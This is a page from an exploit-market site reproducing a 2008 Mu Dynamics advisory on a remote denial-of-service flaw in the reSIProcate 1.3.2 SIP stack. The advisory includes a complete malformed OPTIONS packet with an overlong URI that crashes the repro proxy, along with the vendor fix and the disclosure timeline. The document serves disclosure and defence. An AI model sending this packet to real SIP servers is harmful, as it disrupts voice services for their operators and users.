[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

reSIProcate 1.3.2 Remote Denial of Service PoC

Author
Mu Security
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6559
Category
dos / poc
Date add
11-07-2008
Platform
multiple
==============================================
reSIProcate 1.3.2 Remote Denial of Service PoC
==============================================





-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote DoS in reSIProcate [MU-200807-01]
July 10, 2008

http://labs.mudynamics.com/advisories.html


Affected Products/Versions:

* repro SIP proxy/registrar 1.3.2
http://www.resiprocate.org/ReSIProcate_1.3.2_Release

* Any product using the reSIProcate SIP stack 1.3.2 may also be vulnerable.


Product Overview:

http://www.resiprocate.org/

reSIProcate is a SIP stack.  SIP is a protocol used for voice-over-IP
telephony. repro is a SIP proxy/registrar that uses the reSIProcate SIP stack.


Vulnerability Details:

A malformed INVITE or OPTIONS message to the repro SIP proxy/registrar can
crash the process. The crash is caused by an assertion failure that occurs
when the domain name in the request line URI is too long
(rutil/dns/DnsStub.cxx, line 493). For example, the URI may be
"sip:bob@example.comAAAAAAA...", where "sip:bob@example.com" is followed by
256 As. To cause the crash, the address in the To header must be a valid
target address.

Example invalid packet:
  OPTIONS sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SIP/2.0
  Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport
  To: "Bob" <sip:bob@example.com>
  From: "Alice" <sip:alice@example.com>;tag=W4eHvLYEQX
  Call-ID: nO1DpTVfo4@mudynamics.com
  CSeq: 1 OPTIONS
  Contact: <sip:alice@127.0.0.1:54422>
  Max-Forwards: 70
  Content-Length: 0


Vendor Response / Solution:

Update to 1.3.3, available from
  https://www.resiprocate.org/files/pub/reSIProcate/releases/

This bug was also fixed by the reSIProcate development team in SVN on
April 23 (revision 7628).


History:

July 1, 2008  - First contact with vendor
July 1, 2008  - Vendor acknowledges vulnerability
July 3, 2008  - Vendor releases 1.3.3
July 10, 2008 - Advisory released


Mu-4000 vector:

*.request-line.line.dsv.uri.body.string.append-overflow


Credit:

This vulnerability was discovered by the Mu Dynamics research team.

http://labs.mudynamics.com/pgpkey.txt

Mu Dynamics offers a new class of security analysis system, delivering a
rigorous and streamlined methodology for verifying the robustness and security
readiness of any IP-based product or application. Founded by the pioneers of
intrusion detection and prevention technology, Mu Dynamics is backed by
preeminent venture capital firms that include Accel Partners, Benchmark
Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For
more information, visit the company's website at http://www.mudynamics.com.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (Darwin)

iD8DBQFIdqOZQLdDlEyOXHQRAvt+AJsHGgqEVoiQi0Nb7ND9CR7HteZJpgCeMgKv
5lqpYSLdj7WBeXoD4l95+WA=
=KUQC
-----END PGP SIGNATURE-----



#  0day.today [2024-11-15]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team